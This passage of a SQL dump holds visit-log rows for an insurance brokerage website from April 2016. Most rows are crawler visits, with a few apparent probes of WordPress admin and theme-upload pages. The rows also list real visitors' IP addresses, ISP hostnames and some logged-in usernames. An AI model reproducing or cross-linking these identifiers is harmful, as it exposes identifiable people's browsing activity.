+http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(17601,'0b_bc98bd5f6c3f7e460d6505b9dcd92edd','1460706053','141.8.143.235','spider-141-8-143-235.yandex.com','/meet-the-eib-team/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(17603,'0b_506aec69818967b98343aaf1122bca7d','1460708149','141.8.143.235','spider-141-8-143-235.yandex.com','/agent-tools/','Mozilla/5.0 (compatible; YandexBot/3.0; +http://yandex.com/bots)','','',0,'','','ru','','','Yandex','','','','0','0',0),(17606,'0b_73bb7aa0e9a0607ce2051ecc5006be17','1460708215','157.55.39.183','msnbot-157-55-39-183.search.msn.com','/companylinks.htm','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(17609,'0b_36774a894637cfd14a6bf70288b56786','1460708261','220.181.108.75','220.181.108.75','/','Mozilla/5.0 (compatible; Baiduspider/2.0; +http://www.baidu.com/search/spider.html)','','',0,'','','cn','','','Baiduspider','','','','0','0',0),(17610,'0b_b8325efa6649dd1b91f902bf4c453de2','1460708563','178.32.127.112','WIN-96VQ81BM844','/wp-admin/theme-install.php','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36 OPR/32.0.1948.45','','',0,'Win7','Google Chrome','','','','','','','','3','0',0),(17612,'0b_b8325efa6649dd1b91f902bf4c453de2','1460708569','178.32.127.112','WIN-96VQ81BM844','/wp-admin/theme-install.php?tab=upload','Mozilla/5.0 (Windows NT 6.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/45.0.2454.85 Safari/537.36 OPR/32.0.1948.45','','',0,'Win7','Google Chrome','','','','','','','','3','0',0),(17613,'0b_8dbac5db316d423b0a5aca286435929d','1460715745','40.77.167.59','msnbot-40-77-167-59.search.msn.com','/products.html','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(17615,'0b_cf267976e0abc5618382421d4f1b978c','1460718442','40.77.167.59','msnbot-40-77-167-59.search.msn.com','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(17618,'0b_6f8c316592fb27398f57b2bff3dfac13','1460721138','40.77.167.59','msnbot-40-77-167-59.search.msn.com','/robots.txt','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(17619,'0b_6f8c316592fb27398f57b2bff3dfac13','1460721146','40.77.167.59','msnbot-40-77-167-59.search.msn.com','/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(17621,'0b_6f8e8bf52ef0395e5e46ec669e904485','1460723655','40.77.167.42','msnbot-40-77-167-42.search.msn.com','/quotes.htm','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(17622,'0b_6f8e8bf52ef0395e5e46ec669e904485','1460723765','40.77.167.42','msnbot-40-77-167-42.search.msn.com','/insentives/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(17625,'0b_7b79902c67dc8014fc4270c7f5aeb0ce','1460726079','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','roisy','','0','0',0),(17628,'0b_7b79902c67dc8014fc4270c7f5aeb0ce','1460726081','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','roisy','','0','0',0),(17631,'0b_aa9fb117d32bcf622807192c050b4fcf','1460726223','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(17633,'0b_aa9fb117d32bcf622807192c050b4fcf','1460726224','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','','','','','','','0','0',0),(17636,'0b_f797ea95909f109e3d6b49445fc2becf','1460726280','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(17637,'0b_f797ea95909f109e3d6b49445fc2becf','1460726282','108.58.88.178','ool-6c3a58b2.static.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(17640,'0b_a4f2363e826200a953db5e61814147b5','1460726346','66.249.64.34','crawl-66-249-64-34.googlebot.com','/illustration.htm','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(17643,'0b_70cf0ee04602fc40be840a2934473737','1460727226','5.149.254.109','5.149.254.109','/','Opera/9.80 (J2ME/MIDP Opera Mini/4.2.18149/24.838 U ru) Presto/2.5.25 Version/10.54','','',0,'WAP','Opera Mini 4','ru','','','','','','','0','0',0),(17645,'0b_ac887491ef416733c29a7da17eb31f66','1460727557','54.165.103.145','ec2-54-165-103-145.compute-1.amazonaws.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36','','',0,'Win7','Chrome 28','us','','','','','','','0','0',0),(17646,'0b_ac887491ef416733c29a7da17eb31f66','1460727558','54.165.103.145','ec2-54-165-103-145.compute-1.amazonaws.com','/about-us/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36','','',0,'Win7','Chrome 28','us','','','','','','','0','0',0),(17648,'0b_3af92e030cf4ec03a95fc04e0ed80fbe','1460727614','40.77.167.59','msnbot-40-77-167-59.search.msn.com','/SSO/235_18.html','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(17649,'0b_3af92e030cf4ec03a95fc04e0ed80fbe','1460728168','40.77.167.42','msnbot-40-77-167-42.search.msn.com','/forms/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(17652,'0b_4e8026dd29feb0ee44f81ccc2e05984f','1460728614','91.206.4.194','91-206-4-194.faust.net.ua','/','Mozilla/5.0 (Windows; U; Windows NT 5.1; ru; rv:1.9.2.3) Gecko/20100401 Firefox/3.6.3','','',0,'WinXP','Firefox 3','ru','','','','','','','0','0',0),(17654,'0b_f73acffa0bb4279a3f443955e55da41f','1460729251','52.90.251.234','ec2-52-90-251-234.compute-1.amazonaws.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36','','',0,'Win7','Chrome 28','us','','','','','','','0','0',0),(17657,'0b_bd19f485bbf5b50d63e8b062b19d3352','1460729954','40.77.167.59','msnbot-40-77-167-59.search.msn.com','/SSO/235_38.html','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(17658,'0b_aad0a38030bc50523282ed5d2cb1b3eb','1460730196','91.210.146.10','10.146.dynamic.pppoe.fregat.ua','/wp-admin/','Mozilla/5.0 (Windows; U; Windows NT 6.1; WOW64; rv:15.0) Gecko/20121011 Firefox/15.0.1','','',0,'Win7 x64','Firefox 15','ru','','','','','','','0','0',0),(17662,'0b_1e3ac31f49c048db3c6eb588e0870127','1460731349','112.211.52.125','112.211.52.125.pldt.net','/','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','https://www.google.com.ph/','_notprovided_',1,'Win8','Chrome 49','ph','','Google PH','','','','','0','0',0),(17664,'0b_1e3ac31f49c048db3c6eb588e0870127','1460731357','112.211.52.125','112.211.52.125.pldt.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.3; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win8','Chrome 49','us','','','','','','','0','0',0),(17666,'0b_f06445c2587302bc543798d6a6d248c2','1460732467','67.212.162.98','scan03.sitelock.com','/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(17668,'0b_f06445c2587302bc543798d6a6d248c2','1460732471','67.212.162.98','scan03.sitelock.com','/th1s_1s_a_4o4.html','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(17670,'0b_f06445c2587302bc543798d6a6d248c2','1460732473','67.212.162.98','scan03.sitelock.com','/home/feed/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(17672,'0b_f06445c2587302bc543798d6a6d248c2','1460732487','67.212.162.98','scan03.sitelock.com','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; MSIE 9.0; Windows NT 6.1; WOW64; Trident/6.0)','http://www.google.com/url?url=www.empireins.com&yahoo.com','',0,'Win7 x64','IE 9','','','','','','','','0','0',0),(17674,'0b_a41c7d3c3e0dff322abf282f789a2a09','1460732578','52.91.24.57','ec2-52-91-24-57.compute-1.amazonaws.com','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36','','',0,'Win7','Chrome 28','us','','','','','','','0','0',0),(17676,'0b_a41c7d3c3e0dff322abf282f789a2a09','1460732581','52.91.24.57','ec2-52-91-24-57.compute-1.amazonaws.com','/about-us/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36','','',0,'Win7','Chrome 28','us','','','','','','','0','0',0),(17678,'0b_a41c7d3c3e0dff322abf282f789a2a09','1460732582','52.91.24.57','ec2-52-91-24-57.compute-1.amazonaws.com','/contact/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36','','',0,'Win7','Chrome 28','us','','','','','','','0','0',0),(17680,'0b_a41c7d3c3e0dff322abf282f789a2a09','1460732583','52.91.24.57','ec2-52-91-24-57.compute-1.amazonaws.com','/register/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/28.0.1500.95 Safari/537.36','','',0,'Win7','Chrome 28','us','','','','','','','0','0',0),(17682,'0b_75fbce5fc67973de454c6f106f174977','1460733205','75.99.37.250','ool-4b6325fa.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','','','','','','','0','0',0),(17684,'0b_27141b3392a345c30bbba94d0a9edeb7','1460733232','75.99.37.250','ool-4b6325fa.static.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','http://www.empireins.com/term-quotes/','',0,'Win7 x64','IE 11','us','1347 x 1078','','','','SimkowitzCo','','0','0',0),(17686,'0b_7b79902c67dc8014fc4270c7f5aeb0ce','1460734656','108.58.88.178','ool-6c3a58b2.static.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; rv:11.0) like Gecko','','',0,'Win7 x64','IE 11','us','1536 x 864','','','','roisy','','0','0',0),(17690,'0b_8ac6bd7c76240352f0782d79409c9b4f','1460735110','209.64.152.62','209.64.152.62','/','Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36','','',0,'WinVista','Chrome 39','us','','','','','','','0','0',0),(17693,'0b_8ac6bd7c76240352f0782d79409c9b4f','1460735711','209.64.152.62','209.64.152.62','/','Mozilla/5.0 (Windows NT 6.0; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/39.0.2171.95 Safari/537.36','','',0,'WinVista','Chrome 39','us','','','','','','','0','0',0),(17696,'0b_350a53cd94935bc76382c79fbd56ad92','1460737471','178.255.215.70','crawl06.exabot.com','/robots.txt','Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)','','',0,'','','','','','Exabot','','','','0','0',0),(17699,'0b_350a53cd94935bc76382c79fbd56ad92','1460737473','178.255.215.70','crawl06.exabot.com','/','Mozilla/5.0 (compatible; Exabot/3.0; +http://www.exabot.com/go/robot)','','',0,'','','','','','Exabot','','','','0','0',0),(17700,'0b_28eceecccce5ad2b234a9b8f54c8d64a','1460742418','64.131.200.229','user-1087i75.cable.mindspring.com','/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/601.5.17 (KHTML, like Gecko) Version/9.1 Safari/601.5.17','https://www.google.com/','_notprovided_',1,'MacOSX','Safari 9','us','1280 x 800','Google','','','','','0','0',0),(17702,'0b_28eceecccce5ad2b234a9b8f54c8d64a','1460742418','64.131.200.229','user-1087i75.cable.mindspring.com','/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/601.5.17 (KHTML, like Gecko) Version/9.1 Safari/601.5.17','https://www.google.com/','_notprovided_',1,'MacOSX','Safari 9','us','1280 x 800','Google','','','','','0','0',0),(17704,'0b_28eceecccce5ad2b234a9b8f54c8d64a','1460742422','64.131.200.229','user-1087i75.cable.mindspring.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/601.5.17 (KHTML, like Gecko) Version/9.1 Safari/601.5.17','http://www.empireins.com/','',0,'MacOSX','Safari 9','us','1280 x 800','','','','','','0','0',0),(17706,'0b_28eceecccce5ad2b234a9b8f54c8d64a','1460742446','64.131.200.229','user-1087i75.cable.mindspring.com','/contact/','Mozilla/5.0 (Macintosh; Intel Mac OS X 10_11_4) AppleWebKit/601.5.17 (KHTML, like Gecko) Version/9.1 Safari/601.5.17','http://www.empireins.com/','',0,'MacOSX','Safari 9','us','1280 x 800','','','','','','0','0',0),(17708,'0b_abf6fb5ea03f7a51dd2eb8d71725ae7d','1460743475','40.77.167.78','msnbot-40-77-167-78.search.msn.com','[404] /documents/SunlifeBonus.pdf','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(17710,'0b_abf6fb5ea03f7a51dd2eb8d71725ae7d','1460744140','40.77.167.42','msnbot-40-77-167-42.search.msn.com','/about-us/','Mozilla/5.0 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'','','','','','BingBot','','','','0','0',0),(17712,'0b_c6fd8e1c447573a85f07827a61139c58','1460746864','69.197.163.195','69.197.163.195','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','','','','MJ12bot','','','','0','0',0),(17713,'0b_c6fd8e1c447573a85f07827a61139c58','1460746876','69.197.163.195','69.197.163.195','/term-quotes/feed/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(17715,'0b_c6fd8e1c447573a85f07827a61139c58','1460746890','69.197.163.195','69.197.163.195','/under.html','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','0','0',0),(17716,'0b_e43c204fc627e8df628c59a52c386296','1460747132','40.77.167.78','msnbot-40-77-167-78.search.msn.com','/','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(17718,'0b_742cf4ff4304059135cc0c3741eebf2a','1460747180','66.249.64.67','crawl-66-249-64-67.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(17719,'0b_742cf4ff4304059135cc0c3741eebf2a','1460747180','66.249.64.67','crawl-66-249-64-67.googlebot.com','/apple-app-site-association','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(17720,'0b_1856c843ae20155125d2b1f7be6e572e','1460747191','65.55.210.223','msnbot-65-55-210-223.search.msn.com','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 BingPreview/1.0b','http://www.empireins.com/','',0,'MacOSX','Safari 9537','','','','BingBot','','','','0','0',0),(17722,'0b_7fc3c680641dbe1cee3b35e0889b47bb','1460747392','24.186.240.34','ool-18baf022.dyn.optonline.net','/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','','',0,'Win7','Chrome 49','us','1600 x 900','','','','','','0','0',0),(17723,'0b_7fc3c680641dbe1cee3b35e0889b47bb','1460747393','24.186.240.34','ool-18baf022.dyn.optonline.net','/assets/js/google-code-prettify/prettify.css','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1600 x 900','','','','','','0','0',0),(17725,'0b_7fc3c680641dbe1cee3b35e0889b47bb','1460747395','24.186.240.34','ool-18baf022.dyn.optonline.net','/agent-tools/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/','',0,'Win7','Chrome 49','us','1600 x 900','','','','','','0','0',0),(17727,'0b_7fc3c680641dbe1cee3b35e0889b47bb','1460747419','24.186.240.34','ool-18baf022.dyn.optonline.net','/term-quotes/','Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/49.0.2623.112 Safari/537.36','http://www.empireins.com/agent-tools/','',0,'Win7','Chrome 49','us','1600 x 900','','','','akepecs','','0','51',0),(17730,'0b_79dcf29671f69ed35177df1dc5dabc0a','1460750130','50.251.16.65','50-251-16-65-static.hfc.comcastbusiness.net','/administrator/','Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0','','',0,'Win7','Firefox 31','ot','','','','','','','0','0',0),(17733,'0b_95b83088253301222d5a25b70efda0d5','1460750573','69.30.214.38','69.30.214.38','/robots.txt','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','','','','MJ12bot','','','','3','0',0),(17736,'0b_95b83088253301222d5a25b70efda0d5','1460750584','69.30.214.38','69.30.214.38','/?page_id=169','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','3','0',0),(17739,'0b_95b83088253301222d5a25b70efda0d5','1460750595','69.30.214.38','69.30.214.38','/register/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','3','0',0),(17741,'0b_0e5deba0eb516e4647ac58cdf631ea0c','1460750622','66.249.64.84','crawl-66-249-64-84.googlebot.com','/robots.txt','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(17742,'0b_95b83088253301222d5a25b70efda0d5','1460750648','69.30.214.38','69.30.214.38','/about-us/meet-the-eib-team/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','3','0',0),(17744,'0b_95b83088253301222d5a25b70efda0d5','1460750659','69.30.214.38','69.30.214.38','/meet-the-eib-team/','Mozilla/5.0 (compatible; MJ12bot/v1.4.5; http://www.majestic12.co.uk/bot.php?+)','','',0,'','','en','','','MJ12bot','','','','3','0',0),(17747,'0b_8c3e35ed3863b31613251d811b0b5197','1460755127','66.249.64.94','crawl-66-249-64-94.googlebot.com','/','Mozilla/5.0 (compatible; Googlebot/2.1; +http://www.google.com/bot.html)','','',0,'','','','','','Googlebot','','','','0','0',0),(17750,'0b_bc8eab4d1b6d53811d7c7fd4831baa19','1460755365','64.209.132.8','null8.wc1.yellowpages.com','/','python-requests/2.9.1','','',0,'','','','','','python','','','','0','0',0),(17753,'0b_e7e3c0dbb5e488f6584e5b0d8d1e5f97','1460755684','157.55.39.72','msnbot-157-55-39-72.search.msn.com','/main.html','Mozilla/5.0 (iPhone; CPU iPhone OS 7_0 like Mac OS X) AppleWebKit/537.51.1 (KHTML, like Gecko) Version/7.0 Mobile/11A465 Safari/9537.53 (compatible; bingbot/2.0; +http://www.bing.com/bingbot.htm)','','',0,'iPhone OS','','','','','BingBot','','','','0','0',0),(17754,'0b_6b304046a3cfcc7029938fb3eb87b609','1460756615','104.131.20.42','104.131.20.42','/robots.txt','Mozilla/5.0 (compatible; spbot/5.0.1; +http://OpenLinkProfiler.org/bot )','','',0,'','','us','','','spbot','','','','3','0',0),(17757,'0b_6b304046a3cfcc7029938fb3eb87b609','1460756626','104.131.20.42','104.131.20.42','/','Mozilla/5.0 (compatible; spbot/5.0.1; +http://OpenLinkProfiler.org/bot )','','',0,'','','us','','','spbot','','','','3','0',0),(17759,'0b_6b304046a3cfcc7029938fb3eb87b609','1460756637','104.131.20.42','104.131.20.42','/igo/','Mozilla/5.0 (compatible; spbot/5.0.1; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/','',0,'','','us','','','spbot','','','','3','0',0),(17760,'0b_6b304046a3cfcc7029938fb3eb87b609','1460756650','104.131.20.42','104.131.20.42','/forms/','Mozilla/5.0 (compatible; spbot/5.0.1; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/','',0,'','','us','','','spbot','','','','3','0',0),(17763,'0b_6b304046a3cfcc7029938fb3eb87b609','1460756661','104.131.20.42','104.131.20.42','/contact/','Mozilla/5.0 (compatible; spbot/5.0.1; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/','',0,'','','us','','','spbot','','','','3','0',0),(17766,'0b_6b304046a3cfcc7029938fb3eb87b609','1460756672','104.131.20.42','104.131.20.42','/carriers/','Mozilla/5.0 (compatible; spbot/5.0.1; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/','',0,'','','us','','','spbot','','','','3','0',0),(17768,'0b_6b304046a3cfcc7029938fb3eb87b609','1460756683','104.131.20.42','104.131.20.42','/register/','Mozilla/5.0 (compatible; spbot/5.0.1; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/','',0,'','','us','','','spbot','','','','3','0',0),(17771,'0b_6b304046a3cfcc7029938fb3eb87b609','1460756694','104.131.20.42','104.131.20.42','/about-us/','Mozilla/5.0 (compatible; spbot/5.0.1; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/','',0,'','','us','','','spbot','','','','3','0',0),(17774,'0b_6b304046a3cfcc7029938fb3eb87b609','1460756705','104.131.20.42','104.131.20.42','/insentives/','Mozilla/5.0 (compatible; spbot/5.0.1; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/','',0,'','','us','','','spbot','','','','3','0',0),(17775,'0b_6b304046a3cfcc7029938fb3eb87b609','1460756715','104.131.20.42','104.131.20.42','/term-quotes/','Mozilla/5.0 (compatible; spbot/5.0.1; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/','',0,'','','us','','','spbot','','','','3','0',0),(17777,'0b_6b304046a3cfcc7029938fb3eb87b609','1460756726','104.131.20.42','104.131.20.42','/case-status/','Mozilla/5.0 (compatible; spbot/5.0.1; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/','',0,'','','us','','','spbot','','','','3','0',0),(17780,'0b_6b304046a3cfcc7029938fb3eb87b609','1460756737','104.131.20.42','104.131.20.42','/?page_id=169','Mozilla/5.0 (compatible; spbot/5.0.1; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/forms/','',0,'','','us','','','spbot','','','','3','0',0),(17783,'0b_6b304046a3cfcc7029938fb3eb87b609','1460756748','104.131.20.42','104.131.20.42','/agent-tools/','Mozilla/5.0 (compatible; spbot/5.0.1; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/','',0,'','','us','','','spbot','','','','3','0',0),(17786,'0b_6b304046a3cfcc7029938fb3eb87b609','1460756759','104.131.20.42','104.131.20.42','/licensing-contracting/','Mozilla/5.0 (compatible; spbot/5.0.1; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/','',0,'','','us','','','spbot','','','','3','0',0),(17789,'0b_6b304046a3cfcc7029938fb3eb87b609','1460756771','104.131.20.42','104.131.20.42','/?page_id=171?a=pwdreset','Mozilla/5.0 (compatible; spbot/5.0.1; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/forms/','',0,'','','us','','','spbot','','','','3','0',0),(17792,'0b_6b304046a3cfcc7029938fb3eb87b609','1460756784','104.131.20.42','104.131.20.42','/members/','Mozilla/5.0 (compatible; spbot/5.0.1; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/?page_id=171?a=pwdreset','',0,'','','us','','','spbot','','','','3','0',0),(17795,'0b_6b304046a3cfcc7029938fb3eb87b609','1460756795','104.131.20.42','104.131.20.42','/about-us/meet-the-eib-team/','Mozilla/5.0 (compatible; spbot/5.0.1; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/about-us/','',0,'','','us','','','spbot','','','','3','0',0),(17796,'0b_6b304046a3cfcc7029938fb3eb87b609','1460756806','104.131.20.42','104.131.20.42','/meet-the-eib-team/','Mozilla/5.0 (compatible; spbot/5.0.1; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/about-us/meet-the-eib-team/','',0,'','','us','','','spbot','','','','3','0',0),(17798,'0b_6b304046a3cfcc7029938fb3eb87b609','1460756817','104.131.20.42','104.131.20.42','/aig-releases-new-term-rates-and-re-enters-ny/','Mozilla/5.0 (compatible; spbot/5.0.1; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/','',0,'','','us','','','spbot','','','','3','0',0),(17799,'0b_6b304046a3cfcc7029938fb3eb87b609','1460756828','104.131.20.42','104.131.20.42','/case-success-companion-life-chronic-illness-rider-saves-ltc-decline/','Mozilla/5.0 (compatible; spbot/5.0.1; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/','',0,'','','us','','','spbot','','','','3','0',0),(17801,'0b_6b304046a3cfcc7029938fb3eb87b609','1460756838','104.131.20.42','104.131.20.42','/case-success-voya-turns-aviation-case-into-the-friendly-skies-for-218k-of-target/','Mozilla/5.0 (compatible; spbot/5.0.1; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/','',0,'','','us','','','spbot','','','','3','0',0),(17804,'0b_6b304046a3cfcc7029938fb3eb87b609','1460756849','104.131.20.42','104.131.20.42','/prodmod-john-hancock-is-discontinuing-sale-of-ny-partnership-custom-care-iii-ltc-product/','Mozilla/5.0 (compatible; spbot/5.0.1; +http://OpenLinkProfiler.org/bot )','http://www.empireins.com/','',0,'','','us','','','spbot','','','','3','0',0),(17807,'0b_5fc1c77d4a4b76749632354c8ddaa5e2','1460757326','46.161.9.6','46.161.9.6','/register/','Mozilla/5.0 (iPhone; CPU iPhone OS 8_1_2 like Mac OS X) AppleWebKit/600.1.4 (KHTML, like Gecko) Version/8.0 Mobile/12B440 Safari/600.1.4','','',0,'iPhone OS','Safari 8 Mobile','','','','','','','','0','0',0),(17810,'0b_6aec410dd8af9f1948c2511db68a2c4c','1460758914','180.76.15.142','baiduspider-180-76-15-142.crawl.baidu.com','/register/','Mozilla/5.0 (compatible; Baiduspider/2.0; 